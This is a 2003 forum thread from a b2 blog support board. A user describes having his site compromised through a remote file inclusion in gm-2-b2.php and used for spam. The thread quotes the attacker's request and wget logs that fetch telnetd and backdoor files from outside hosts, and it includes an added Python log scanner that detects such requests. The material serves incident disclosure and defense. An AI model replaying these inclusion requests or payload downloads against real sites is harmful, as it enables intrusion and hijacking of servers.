boardom b2 message board
dep21
Joined: 09 Oct 2003 Posts: 2
Posted: Thu Oct 09, 2003 5:10 pm Post subject: Hacked and used as a spammer's b*tch!
Hello folks,
I've just been hacked via my b2 software. I hadn't been keeping up with development of b2 and hence missed these security updates:
http://tidakada.com/board/viewtopic.php?t=3212&highlight=hacked
On Tuesday, I started getting oodles of 'Mail Delivery Failures' from AOL. Someone had been forging my domain on spams. This has happened to me before - very easy to do, after all - so I sat back and waited for it all to stop.
Today, in a completely unrelated incident, I happened across this document, which relates someone's experience of being hacked by a spammer and used to send unwanted email (not using b2, though):
http://www.linuxsecurity.com/articles/privacy_article-8082.html
Towards the end of that article, he mentions finding a similar b2 exploit. Interested, but not connecting it to all the spam as yet (been a long day, synapses not firing properly), I thought I'd browse my access logs and error log and see if I could see anything - more just to browse through the logs than expecting to see anything. And then I see this in my error log:
Quote:
--22:41:46-- http://www.zueirareri.hpg.com.br/telnetd
=> `telnetd'
Resolving www.zueirareri.hpg.com.br... done.
Connecting to www.zueirareri.hpg.com.br[200.226.137.9]:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: http://www.zueirareri.hpg.ig.com.br/telnetd [following]
--22:41:47-- http://www.zueirareri.hpg.ig.com.br/telnetd
=> `telnetd'
Resolving www.zueirareri.hpg.ig.com.br... done.
Connecting to www.zueirareri.hpg.ig.com.br[200.222.209.203]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 170,613 [text/plain]
0K .......... .......... .......... .......... .......... 30% 34.34 KB/s
50K ...... 34% 6.60 MB/s
22:56:50 (38.96 KB/s) - Read error at byte 58120/170613 (Connection timed out). Retrying.
--22:56:50-- http://www.zueirareri.hpg.ig.com.br/telnetd
(try: 2) => `telnetd'
Connecting to www.zueirareri.hpg.ig.com.br[200.222.209.203]:80... connected.
HTTP request sent, awaiting response... 206 Partial Content
Length: 170,613 (112,493 to go) [text/plain]
[ skipping 50K ]
50K ,,,,,,.... .......... .......... .......... .......... 60% 29.86 KB/s
100K .......... .......... .......... .......... .......... 90% 133.33 KB/s
150K .......... ...... 100% 40.23 KB/s
22:56:53 (49.13 KB/s) - `telnetd' saved [170613/170613]
--22:56:54-- http://dede987.tripod.com/bbrdoor
=> `bbrdoor'
Resolving dede987.tripod.com... done.
Connecting to dede987.tripod.com[209.202.196.70]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
0K .......... ........ 92.74 KB/s
22:56:55 (92.74 KB/s) - `bbrdoor' saved [18803]
Lord knows what that's doing in my error log, but hey... Anyway, that got me just a teensy worried. I then found three files in my /tmp/ directory - two telnet daemons and the bbrdoor file.
So I check my access log for Tuesday, just before the activity above. And I find:
200.163.90.122 - - [07/Oct/2003:23:50:57 -0600] "GET /b2-tools/gm-2-b2.php?b2inc=http://dedezao.tripod.com HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 9 "
Oh sh*t, I think. I've been hacked. So I wander on over here and find the above security announcement and rather quickly update my b2 software.
So, in case anyone HASN'T updated their b2 stuff, DO IT NOW. Because someone out there is searching for b2 blogs that haven't been patched, and they're using it for spam. I'm just lucky in one sense that this was a spammer and not someone who wanted to mess around with all my files... And if there are any other holes in the software, please let me know!
By the way, the Tripod site is dead, but the www.zueirareri.hpg.ig.com.br web site is still there.
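The access log line quoted in the post is the characteristic trace of a remote file inclusion: a script parameter (here b2inc) is handed a URL, and the unpatched include() fetches and executes whatever that URL serves. As an added example, not code from this thread or from the b2 project, the following Python scans combined-format web server access logs for request parameters whose value is a remote URL or PHP stream wrapper. The first sample line is the one posted above; the other lines, the IP addresses in them and the helper names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined log format: ip ident user [time] "method target proto" status bytes ...
# (referer and user-agent are not needed for this check, so they are not captured)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# A parameter value beginning with one of these makes include() reach outside
# the local tree (remote URL or stream wrapper), which is what the attacker
# in the thread relied on.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")

# Constructed sample log. Line 1 is the request quoted in the post; the
# rest are made-up benign traffic plus one percent-encoded variant.
SAMPLE_LOG = [
    '200.163.90.122 - - [07/Oct/2003:23:50:57 -0600] "GET /b2-tools/gm-2-b2.php?b2inc=http://dedezao.tripod.com HTTP/1.1" 200 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 9 "',
    '192.0.2.10 - - [07/Oct/2003:23:51:12 -0600] "GET /b2-tools/gm-2-b2.php?b2inc=b2config.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Oct/2003:00:02:03 -0600] "GET /b2-tools/gm-2-b2.php?b2inc=http%3A%2F%2F203.0.113.5%2Fx HTTP/1.1" 200 - "-" "-"',
    '192.0.2.20 - - [08/Oct/2003:00:05:00 -0600] "GET /index.php?p=12 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [08/Oct/2003:00:06:00 -0600] "POST /b2login.php HTTP/1.1" 302 - "-" "-"',
    'this line is not a valid log record',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(target):
    """Return (name, value) pairs from the query string whose value is remote.

    parse_qsl percent-decodes values, so an encoded http%3A%2F%2F is caught too.
    """
    query = urlsplit(target).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits


def scan(lines):
    """Return one finding per (request, parameter) that looks like an RFI attempt."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines rather than crash mid-log
        for name, value in suspicious_params(rec["target"]):
            findings.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "path": urlsplit(rec["target"]).path,
                "param": name,
                "value": value,
                "status": rec["status"],
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']}={f['value']} (HTTP {f['status']})")
```

A 200 status on such a request, as in the quoted line, is the part worth alarming on: it means the script ran with the attacker-supplied include rather than rejecting it. Run the check over the real log with `scan(open(path))`; the local-file include on the second sample line is deliberately not flagged, since this check only targets the remote case the thread describes.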
Viper007Bond
Joined: 15 Aug 2003 Posts: 266 Location: Portland, Oregon, USA
Posted: Thu Oct 09, 2003 6:07 pm Post subject:
Why not just delete the file gm-2-b2.php and all of the other files you don't use?
_________________
http://www.viper007bond.com
If you haven't already installed b2, I advise you look into WordPress or b2evo instead as b2 is dead.
dep21
Joined: 09 Oct 2003 Posts: 2
Posted: Thu Oct 09, 2003 9:43 pm Post subject:
Viper007Bond wrote:
    Why not just delete the file gm-2-b2.php and all of the other files you don't use?
Have done that now... I'd not used php before using b2, so wasn't sure after installation which files were necessary and which weren't. The gm-2 file has now bitten the dust.
Powered by phpBB 2 © 2001, 2002 phpBB Group